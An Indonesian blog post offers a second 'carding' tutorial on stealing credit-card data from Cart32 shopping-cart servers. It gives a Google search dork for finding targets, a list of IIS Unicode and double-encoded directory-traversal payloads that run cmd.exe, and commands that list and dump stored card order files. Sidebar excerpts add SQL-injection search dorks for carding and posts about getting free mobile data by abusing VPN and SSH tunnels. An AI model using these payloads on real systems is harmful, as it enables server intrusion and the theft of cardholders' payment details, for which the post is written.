Skip to main content

Tutorial Carding (Bagian II)

1. Sama seperti tutorial pertama, Cari target dahulu di google.com dgn keyword allinurl:/cart32.exe/
2. Misalkan kita mendapat target dg url:
http://www.contoh.com/scripts/cart32.exe/blablabla , maka:

3. Ganti url tsb menjadi -> http://www.contoh.com/scripts/
4. Modifikasi url tsb dg memasukkan unicode dibelakangnya -> http://www.contoh.com/scripts/<unicode&gt;
5. Contoh unicode utk path /scripts/ : –>
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
Sedangkan utk path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
6. Sebagai contoh, pada url diatas menggunakan path /scripts/ maka diubah menjadi http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
7. string diakhir unicode dg keterangan dir+c:\ maksudnya kita sedang berada dan melist directory c server target!
8. Untuk masuk ke directory cc’s ganti perintahnya unicode dgn -> http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
9. Kita akan output list dari file .32 sebagai contoh namanya WRBURNS-001065.c32
10. Nah.., utk melihat filenya dg unicode http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
11. Kalo tidak berhasil, kita masih bisa mencobanya dengan unicode yg laennya.
12. Ok, semoga berhasil, materi ke-2 Selesai.
Labels:

Comments

Post a Comment

Popular posts from this blog

Dord Carding 2014

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview....
Post a Comment
Read more

[Update 06-09-2016] Config open vpn sc three jabar only.

Assalamualaikum gan/sist kali ini saya akan share config open vpn update dari postingan sebelumnya. ga usah banya tanya lah langsung aja ini bukti konek. terus tanpa saweran juga pokonya tanpa pulsa tanpa kuota. hehehe Dan bukti kedua  Langsung saja saya kasih bahan sama Triknya untuk gratisan. Aplikasi Open Vpn Client Ambil Di Sini [Download]. Config Open Vpnya Ambil Di Sini [Download]. Tentunya Hp Android :v Jangan lupa sambil ngopi Jangan lupa juga mandi dulu :D Dan dua bahan tersebut harus di download soalnya kalo tanpa itu ga akan bisa gratisa. Ya segitu saja dari saya, semoga gratisanya di pergunakan dengan baik :D NOTE: Jika ada yang bingung atau mau bertanya silahkan hubungi saya via Facebook Thanks Wasalam.
1 comment
Read more

Cara Memakai SSH + Injek Di Pc (VIDEO)

Asslamualaikum Wrwb. Nah berhubung banyak yang request cara memakai ssh dan injek, Jadi malam ini saya akan share cara memakai ssh dan injek di pc, dalam bentuk video supaya mempermudah bagi para pemula. Nah apa sih ssh itu? Munggkin kebanyakan orang ssh adalah untuk berinternet gratis . Dan ini menurut ( Wikipedia) . Dan apa sih kegunaan injek itu. Bagi saya injek adalah tool pendorong untuk internet gratis dan pendorong ssh. Sudah cukup jelas? Dan ini adalah bahan bahan yang di butukan sebelum memulai tutorial. Bitvise Download Proxyfier Download Injek Download   Akun SSH *Bila Ingin Akun Premium Silahkan Order Ke Admin Via Facebook Dan Ini Sedikit Penampakan Tutorianya. Dan bila semua bahan sudah di download next sekarang download video tutorialnya. Tutorial Download Di Sini  Dan sekian dari saya semoga membantu anda. Mohon maaf bila ada kesalahan. Dan bila ada masalah dengan ini silahkan kontak admin atau berkomentar dengan sopan. Terima...
Post a Comment
Read more